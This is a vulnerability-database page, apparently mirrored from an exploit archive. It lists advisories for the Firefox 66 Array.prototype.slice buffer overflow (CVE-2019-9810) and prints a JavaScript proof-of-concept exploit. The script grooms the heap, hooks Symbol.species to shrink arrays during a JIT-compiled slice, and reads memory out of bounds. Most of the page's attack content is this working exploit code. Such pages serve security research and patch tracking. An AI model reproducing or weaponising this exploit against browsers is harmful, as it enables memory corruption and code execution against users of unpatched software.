Lucene search

K

Firefox 66.0.1 - Array.prototype.slice Buffer Overflow Exploit

🗓️ 27 Mar 2019 00:00:00Reported by xuechiyaobaiType 
zdt
 zdt
🔗 0day.today👁 46 Views

Firefox Array.prototype.slice Buffer Overflow Exploit version 66.0.

Show more
Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Mozilla Firefox IonMonkey JIT Compiler Buffer Overflow (CVE-2019-9810)
3 Apr 201900:00
checkpoint_advisories
Prion
Buffer overflow
26 Apr 201917:29
prion
Packet Storm
Firefox Array.prototype.slice Buffer Overflow
27 Mar 201900:00
packetstorm
UbuntuCve
CVE-2019-9810
25 Mar 201900:00
ubuntucve
NVD
CVE-2019-9810
26 Apr 201917:29
nvd
Veracode
Buffer Overflow
16 May 201903:58
veracode
Exploit DB
Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow
26 Mar 201900:00
exploitdb
Exploit DB
Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack
7 Dec 201900:00
exploitdb
Zero Day Initiative
(Pwn2Own) Mozilla Firefox Array.slice Out-Of-Bounds Write Remote Code Execution Vulnerability
15 Apr 201900:00
zdi
Debian CVE
CVE-2019-9810
26 Apr 201917:29
debiancve
Rows per page
Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow 

<script>

let size = 64;

garr = [];
j = 0;
function gc(){
	var tmp = [];
	for(let i = 0;i < 0x20000;i++){
		tmp[i] = new Uint32Array(size * 2);
		for(let j = 0;j < (size*2);j+=2){
			tmp[i][j] = 0x12345678;
			tmp[i][j+1] = 0xfffe0123;
		}
	}
	garr[j++] = tmp;
}

let arr = [{},2.2];

let obj = {};

obj[Symbol.species] = function(){
	victim.length = 0x0;
	for(let i = 0;i < 0x2000;i++){
		gvictim[i].length = 0x0;
		gvictim[i] = null;
	}
	gc();
	//Array.isArray(garr[0][0x10000]);
	return [1.1];
}

let gvictim = [];

for(let i = 0;i < 0x1000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);

for(let i = 0x1000;i < 0x2000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

function fake(arg){
}
for(let i = 0;i < size;i++){
	fake["x"+i.toString()] = 2.2;
}

function jit(){
	victim[1] = 1.1;
	arr.slice();
	//fake.x2 = 6.17651672645e-312;
	return victim[2];
}

flag = 0;


for(let i = 0;i < 0x10000;i++){
	xx = jit();
}

arr.constructor = obj;

Array.isArray(victim);
alert(333);
alert(jit());
</script>

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Mar 2019 00:00Current
0.9Low risk
Vulners AI Score0.9
CVSS26.8
CVSS38.8
EPSS0.936
46
.json
Report